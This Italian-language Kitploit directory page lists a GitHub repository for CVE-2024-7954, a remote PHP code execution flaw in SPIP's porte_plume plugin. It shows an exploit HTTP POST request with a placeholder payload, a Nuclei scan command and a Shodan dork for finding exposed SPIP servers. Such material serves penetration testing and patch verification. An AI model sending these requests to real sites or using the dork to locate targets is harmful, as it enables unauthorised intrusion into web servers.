Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
RCE_CVE-2024-7954- — Il plugin porte_plume utilizzato da SPIP prima delle versioni 4.30-alpha2, 4.2.13 e 4.1.16 è vulnerabile a una vulnerabilità di esecuzione di codice arbitrario. Un attaccante remoto e non autenticato può eseguire codice PHP arbitrario come utente SPIP inviando una richiesta HTTP appositamente predisposta. (CRITICO) | Kitploit
Strumenti/GitHubGitHub/0dayan0n/rce_cve-2024-7954-
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHub0dayan0n/rce_cve-2024-7954-

RCE_CVE-2024-7954-

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
21491 anno faNon ancora revisionato

Informazioni

Il plugin porte_plume utilizzato da SPIP prima delle versioni 4.30-alpha2, 4.2.13 e 4.1.16 è vulnerabile a una vulnerabilità di esecuzione di codice arbitrario. Un attaccante remoto e non autenticato può eseguire codice PHP arbitrario come utente SPIP inviando una richiesta HTTP appositamente predisposta. (CRITICO)

Condividi

RCE_CVE-2024-7954-

Il plugin porte_plume utilizzato da SPIP prima di 4.30-alpha2, 4.2.13 e 4.1.16 è vulnerabile a una vulnerabilità di esecuzione di codice arbitrario. Un attaccante remoto e non autenticato può eseguire PHP arbitrario come utente SPIP inviando una richiesta HTTP manipolata. (CRITICA)

Exploit:

POST /index.php?action=porte_plume_previsu HTTP/1.1

Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded

data=AA_[->URL]_BB

Strumento utilizzato:

Nuclei -l(target file) -t(Templates) CVE-2024-7954.yml

Shodan Dork:

app="SPIP"

Scarica lo strumento